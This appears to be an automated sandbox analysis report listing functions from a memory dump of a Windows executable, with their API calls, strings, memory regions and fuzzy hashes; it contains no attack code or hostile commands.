Instruction ID: 5e7af6687472f7778d4718a4b2b364bf4d22fe1c4c1d33568b647f9ae5402526
Opcode Fuzzy Hash: 4c2a0f0b9636227887219dd18b533bb99c686f22abcbd621c92328b20fc573e8
Instruction Fuzzy Hash: BDA14CB1704B4086EB66CB6BE9843E937E1F34DBD4F54422AEB9987AB5DB34C851C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000193D, Relevance: 10.7, APIs: 7, Instructions: 180timewindowCOMMON

Download Yara Rule

APIs

SetTimer.USER32 ref: 00000001400019AA
GetTickCount.KERNEL32 ref: 0000000140001A20
GetTickCount.KERNEL32 ref: 0000000140001A7F
GetMessageW.USER32 ref: 0000000140001AC9
GetTickCount.KERNEL32 ref: 0000000140001AD8

Part of subcall function 00000001400039D0: joyGetPosEx.WINMM ref: 0000000140003A27
Part of subcall function 00000001400039D0: PostMessageW.USER32 ref: 0000000140003A86

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: CountTick$Message$PostTimer
String ID:
API String ID: 3009163648-0
Opcode ID: 77e5bdd54f257c9e174b2bc44ddfae568eccae59172696b476d1b1fd7f4d874b
Instruction ID: ca448e0bf649282658e7eb1253a2044d493c545ef039d3bf36e2a17d050d3b85
Opcode Fuzzy Hash: 77e5bdd54f257c9e174b2bc44ddfae568eccae59172696b476d1b1fd7f4d874b
Instruction Fuzzy Hash: 7B81BFB26057818AFB27CF26A4947E927E1BB8DBC4F180129FB4907AB5DB78C441DB41

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400181B0, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 186COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32 ref: 00000001400181EE

Part of subcall function 0000000140087B90: FindFirstFileW.KERNEL32 ref: 0000000140087CAF
Part of subcall function 0000000140087B90: FindClose.KERNEL32 ref: 0000000140087CC5
Part of subcall function 0000000140087B90: FindFirstFileW.KERNEL32 ref: 0000000140087D07
Part of subcall function 0000000140087B90: FindClose.KERNEL32 ref: 0000000140087D16

GetModuleFileNameW.KERNEL32 ref: 0000000140018415

Strings

C:\Users\user\Desktop, xrefs: 00000001400181BA
%s\%s, xrefs: 0000000140018367
Out of memory., xrefs: 0000000140018244, 00000001400182EA, 00000001400183B7

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: FileFind$CloseFirstModuleName
String ID: %s\%s$C:\Users\user\Desktop$Out of memory.
API String ID: 551415897-80433629
Opcode ID: 89721830dc247782bd175d41346b8f9cb47f51ada5edf2b305f010aae31f85d4
Instruction ID: 68fc07b35f8a21eff1fa008abd8fd3d1cc5b0ea6f457d46f2f324537401f896a
Opcode Fuzzy Hash: 89721830dc247782bd175d41346b8f9cb47f51ada5edf2b305f010aae31f85d4
Instruction Fuzzy Hash: 2C819232225B8081EA66DB12E4507DA63A4FB587E4F846311FF7A4BBF5EB39C605C340

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400B4F58, Relevance: 7.7, APIs: 5, Instructions: 203COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00000001400B4F9D

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 87f029c61b1964b5d3d051b045c626caeb3c531624b754c86345cd830e94cf12
Instruction ID: e75311ff11c13882f58586ecfa224e83cca43f2916b942fe5c68605d346f9b3e
Opcode Fuzzy Hash: 87f029c61b1964b5d3d051b045c626caeb3c531624b754c86345cd830e94cf12
Instruction Fuzzy Hash: DC819B32620E5189F722AFAB98907EE27B1B388BC9F444665EF0A577F5CB34C446C710

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140018C80, Relevance: 7.7, APIs: 5, Instructions: 194timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32 ref: 0000000140018D6E

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Timer
String ID:
API String ID: 2870079774-0
Opcode ID: 847f8c0426e92bc9827668e93a4bc67dd1ad98c0c2474724ebb27db151836c5f
Instruction ID: 8aba855fc39ae96317f24178c565778b6144ec4c3c26da3c11208225e16f31a4
Opcode Fuzzy Hash: 847f8c0426e92bc9827668e93a4bc67dd1ad98c0c2474724ebb27db151836c5f
Instruction Fuzzy Hash: 88B17F73A14BC486E712CB2DD5113E837A0F7ADB88F19A219EF8813672DB7992D5D300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140044417, Relevance: 7.5, APIs: 5, Instructions: 44timeclipboardCOMMON

Download Yara Rule

APIs

GlobalUnWire.KERNEL32 ref: 0000000140044430
CloseClipboard.USER32 ref: 000000014004443D
GetCurrentProcessId.KERNEL32 ref: 0000000140044451
EnumWindows.USER32 ref: 000000014004446C
SetTimer.USER32 ref: 00000001400444B2

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: ClipboardCloseCurrentEnumGlobalProcessTimerWindowsWire
String ID:
API String ID: 2048928095-0
Opcode ID: e5d6583fd667b9c07311e56bac20e6c288734c1e76d70f26e7c0a6b8fe693c79
Instruction ID: cf738602aec9955a2b9866775376a2927456525f6e17eb2ab5f901b1addf16f8
Opcode Fuzzy Hash: e5d6583fd667b9c07311e56bac20e6c288734c1e76d70f26e7c0a6b8fe693c79
Instruction Fuzzy Hash: 202123B9204B8296EB22CF57B8803C963A4F78CBD5F490522EB8943A39DF78C445CB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000014003D6BD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

GetExitCodeProcess.KERNEL32 ref: 000000014003D6CE
GetTickCount.KERNEL32 ref: 000000014003D6E7
CloseHandle.KERNEL32 ref: 000000014003D783

Strings

MZ@, xrefs: 000000014003D712, 000000014003D74A

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: CloseCodeCountExitHandleProcessTick
String ID: MZ@
API String ID: 1079426074-2978689999
Opcode ID: 81de085af4b8d7b7ce8772fb8a60fa8df252afc2c48cfbfc07ef698c89b20474
Instruction ID: befe47d2d1826470ff676243a2d6f69bb9c9af6f52caeb5d1b6818dd6739d6ff
Opcode Fuzzy Hash: 81de085af4b8d7b7ce8772fb8a60fa8df252afc2c48cfbfc07ef698c89b20474
Instruction Fuzzy Hash: 0B318E76208A8085E727DF16F4543EA7760F78DBD5F444006EB9983BA9DE78C186CB01

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000BA40, Relevance: 4.6, APIs: 3, Instructions: 72windowCOMMON

Download Yara Rule

APIs

PostQuitMessage.USER32 ref: 000000014000BA52

Part of subcall function 000000014000A2B0: CreateThread.KERNEL32 ref: 000000014000A325
Part of subcall function 000000014000A2B0: SetThreadPriority.KERNEL32 ref: 000000014000A343
Part of subcall function 000000014000A2B0: PostThreadMessageW.USER32 ref: 000000014000A381
Part of subcall function 000000014000A2B0: Sleep.KERNEL32 ref: 000000014000A38E
Part of subcall function 000000014000A2B0: GetTickCount.KERNEL32 ref: 000000014000A39D
Part of subcall function 000000014000A2B0: PeekMessageW.USER32 ref: 000000014000A3CA

UnhookWindowsHookEx.USER32 ref: 000000014000BA6D
UnregisterHotKey.USER32 ref: 000000014000BAC8

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: MessageThread$Post$CountCreateHookPeekPriorityQuitSleepTickUnhookUnregisterWindows
String ID:
API String ID: 3108639398-0
Opcode ID: ab47064901ba79550a548394bb8d2e65ca9e29fca641ee7e79c7963518f29370
Instruction ID: d4e500956f65c900aa3683b0eaa447b74d893203a0557032e1a7fc2dc947475d
Opcode Fuzzy Hash: ab47064901ba79550a548394bb8d2e65ca9e29fca641ee7e79c7963518f29370
Instruction Fuzzy Hash: 152139B6305B4486EA5ADF27F8903AA37A1B74DBC0F09412AFB8957B35DB78C0848300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140032480, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

Part of subcall function 0000000140029AF0: GlobalUnWire.KERNEL32 ref: 0000000140029B8A
Part of subcall function 0000000140029AF0: CloseClipboard.USER32 ref: 0000000140029B99
Part of subcall function 0000000140029AF0: GetTickCount.KERNEL32 ref: 0000000140029BAE
Part of subcall function 0000000140029AF0: PeekMessageW.USER32 ref: 0000000140029BE3
Part of subcall function 0000000140029AF0: GetTickCount.KERNEL32 ref: 0000000140029BF7

GetTickCount.KERNEL32 ref: 000000014003258F

Strings

MZ@, xrefs: 00000001400324A8, 00000001400325E4

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekWire
String ID: MZ@
API String ID: 849950280-2978689999
Opcode ID: b09ff208931aded6893cb8adebfd3e09b0b500a264ee684950dbe79183fd191d
Instruction ID: 3d65b10ed3fef53cda65a0db6dfc4e6fde2eab73fcb4082a5bfabb2b458d76a5
Opcode Fuzzy Hash: b09ff208931aded6893cb8adebfd3e09b0b500a264ee684950dbe79183fd191d
Instruction Fuzzy Hash: 9B415E72708A9486EB67CB17E9503AA67A1F78CBD4F148115FF9943BB9DB38C581C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014004450F, Relevance: 3.0, APIs: 2, Instructions: 20COMMON

Download Yara Rule

APIs

IsWindow.USER32 ref: 0000000140044512
GetWindowTextW.USER32 ref: 0000000140044528

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Window$Text
String ID:
API String ID: 848690642-0
Opcode ID: 383889b9d0e877e3900faacff9037107133782a6b03b4272928bab8488d84dc2
Instruction ID: 98b3345ca6c5c8683ee01e221abaacf50ae80411164ebc8db7185126aa081ace
Opcode Fuzzy Hash: 383889b9d0e877e3900faacff9037107133782a6b03b4272928bab8488d84dc2
Instruction Fuzzy Hash: 12E01A36318A8185EB65CB23A5447A91362F749FD4F494062DE4A53B24CE39C446D704

Uniqueness

Uniqueness Score: -1.00%

Function 000000014004F950, Relevance: 1.6, APIs: 1, Instructions: 91COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32 ref: 000000014004FA2D

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: 3f7b802eeb271a92ec99a51b5f4ca4c3ead8372490f73c9e0a921ac7d07f7af2
Instruction ID: 780c193537da823559d8037c39f8e71a61e44cb59e4302a7a6e3f89561941bb8
Opcode Fuzzy Hash: 3f7b802eeb271a92ec99a51b5f4ca4c3ead8372490f73c9e0a921ac7d07f7af2
Instruction Fuzzy Hash: 2F31E37121464482E771DB26E5843BA72A0F34C7D0F564232FB9AC36E4EB38ED50E755

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400B1238, Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 00000001400B128D

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c07b2ffcb2600a5d5c101b5daa12416307903b8164e914d813a669d8e38c33ac
Instruction ID: 324e69af4226ad03c8392e356ac54f961b6eb8c51379678808530e144f7c43ab
Opcode Fuzzy Hash: c07b2ffcb2600a5d5c101b5daa12416307903b8164e914d813a669d8e38c33ac
Instruction Fuzzy Hash: 1AF0F974701B0581FE5A5FE759613E513A55BCDBC0F885434AB0AC76EADD7CC9914220

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400B11D8, Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 00000001400B1216

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8bfbf4ebb751c2b3a4726173152b125ffe8becc0d6eb46bee45a53f47e974557
Instruction ID: a09f980ce5acc2075d3f54a5461a58f957e2c1edcaa9b8dab6f59b903451e37f
Opcode Fuzzy Hash: 8bfbf4ebb751c2b3a4726173152b125ffe8becc0d6eb46bee45a53f47e974557
Instruction Fuzzy Hash: 15F08C30705A0585FA6A6FF369003E952B05BCC7E0F8806207F26C72FADA78C4914660

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140083D20, Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 0000000140083D2B

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef6dcc2d0c50af96da0f8d56621ec547e32a07f1962af12f04a5feea29d38d47
Instruction ID: e1b6980e9d656404c5a452de2f1f541a265dbda38d5e6c6e91350b65a1da03c7
Opcode Fuzzy Hash: ef6dcc2d0c50af96da0f8d56621ec547e32a07f1962af12f04a5feea29d38d47
Instruction Fuzzy Hash: B4F01C72701B0082E796DB62F45139932E4E79CB94F441238FB9D4B3A6EB78C5E18B50

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140017DD6, Relevance: 1.5, APIs: 1, Instructions: 15comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32 ref: 0000000140017DEF

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 6fc85b3580835e98fb09a58a5c52ff5b9e4df9d67572389d0d8803bb9369c85e
Instruction ID: 24ba58874aaf3f9c0fcab318f362237076b53426722e46ab87c03a0d12b4d261
Opcode Fuzzy Hash: 6fc85b3580835e98fb09a58a5c52ff5b9e4df9d67572389d0d8803bb9369c85e
Instruction Fuzzy Hash: 36D0A73670831082E7169B2AF251FADA331EB8DBD0F040411AF0A1BFA9CE3AC0908B00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140001259, Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

_onexit.LIBCMT ref: 00000001400A2950

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: _onexit
String ID:
API String ID: 572287377-0
Opcode ID: e2b4c18f64ce57a15ec4f57ef9f4ec757584625dab262b2aa3dc023fd5334ed6
Instruction ID: 68e3f7fef4050f4f7c37b3d3b486175a67bcbd1aa484210f50333c3c6284a92e
Opcode Fuzzy Hash: e2b4c18f64ce57a15ec4f57ef9f4ec757584625dab262b2aa3dc023fd5334ed6
Instruction Fuzzy Hash: 75C04C35F5750AD1E919B77B89863E4115057BE790F900712A30AC26B1D82C82E75E01

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00000001400883F0, Relevance: 93.3, APIs: 31, Strings: 22, Instructions: 523libraryloaderfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00000001400A9358: _invalid_parameter_noinfo.LIBCMT ref: 00000001400A9384

LoadLibraryW.KERNEL32 ref: 0000000140088671
GetFileAttributesW.KERNEL32 ref: 00000001400886EF
LoadImageW.USER32 ref: 00000001400886CF

Part of subcall function 00000001400A6D70: _invalid_parameter_noinfo.LIBCMT ref: 00000001400A6D97

LoadLibraryW.KERNEL32 ref: 0000000140088793
CreateFileW.KERNEL32 ref: 00000001400887C4
GetFileSize.KERNEL32 ref: 00000001400887DC
GlobalAlloc.KERNEL32 ref: 00000001400887EC
CloseHandle.KERNEL32 ref: 00000001400887FD
GlobalLock.KERNEL32 ref: 000000014008880D
CloseHandle.KERNEL32 ref: 000000014008881B
GlobalFree.KERNEL32 ref: 0000000140088824

Part of subcall function 00000001400A6D70: _invalid_parameter_noinfo.LIBCMT ref: 00000001400A6E35

ReadFile.KERNEL32 ref: 0000000140088841
GlobalUnWire.KERNEL32 ref: 000000014008884A
CloseHandle.KERNEL32 ref: 0000000140088853
OleLoadPicture.OLEAUT32 ref: 000000014008888A
GlobalFree.KERNEL32 ref: 00000001400888AB
GetProcAddress.KERNEL32 ref: 00000001400888F0
GetProcAddress.KERNEL32 ref: 0000000140088903
GetProcAddress.KERNEL32 ref: 0000000140088917
GetProcAddress.KERNEL32 ref: 000000014008892B
GetProcAddress.KERNEL32 ref: 000000014008893F
FreeLibrary.KERNEL32 ref: 00000001400889AC
GetIconInfo.USER32 ref: 00000001400889C9
GetObjectW.GDI32 ref: 00000001400889E4
DeleteObject.GDI32 ref: 0000000140088A67
DeleteObject.GDI32 ref: 0000000140088A71
DestroyCursor.USER32 ref: 0000000140088A88
LoadImageW.USER32 ref: 0000000140088AA6
CopyImage.USER32 ref: 0000000140088AD6
DestroyCursor.USER32 ref: 0000000140088AF3
CopyImage.USER32 ref: 0000000140088B44

Strings

exe, xrefs: 0000000140088512
GdipDisposeImage, xrefs: 0000000140088931
GdiplusShutdown, xrefs: 00000001400888F6
dll, xrefs: 0000000140088525
icl, xrefs: 0000000140088538
hicon:, xrefs: 0000000140088446
cpl, xrefs: 000000014008854B
scr, xrefs: 000000014008855E
ani, xrefs: 00000001400885F0
bmp, xrefs: 0000000140088603
GdipCreateBitmapFromFile, xrefs: 0000000140088909
jpeg, xrefs: 000000014008875D
*, xrefs: 0000000140088499
ico, xrefs: 00000001400885C1
jpg, xrefs: 000000014008874A
gdiplus, xrefs: 000000014008866A, 000000014008878C
cur, xrefs: 00000001400885DD
gif, xrefs: 0000000140088770
GdiplusStartup, xrefs: 00000001400888E6
:, xrefs: 000000014008847E
GdipCreateHBITMAPFromBitmap, xrefs: 000000014008891D
hbitmap:, xrefs: 000000014008846E

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: AddressGlobalLoadProc$FileImage$CloseFreeHandleLibraryObject_invalid_parameter_noinfo$CopyCursorDeleteDestroy$AllocAttributesCreateIconInfoLockPictureReadSizeWire
String ID: *$:$GdipCreateBitmapFromFile$GdipCreateHBITMAPFromBitmap$GdipDisposeImage$GdiplusShutdown$GdiplusStartup$ani$bmp$cpl$cur$dll$exe$gdiplus$gif$hbitmap:$hicon:$icl$ico$jpeg$jpg$scr
API String ID: 2878876949-1932607546
Opcode ID: 7222251442592e42b806a6b82dcb0bc59407b22abb7a5c0692554d2771f97951
Instruction ID: 52be1733a15ea0bde01f0c7c033ecd9cd0d93f22d1565ac8b07fd55dc475d5ce
Opcode Fuzzy Hash: 7222251442592e42b806a6b82dcb0bc59407b22abb7a5c0692554d2771f97951
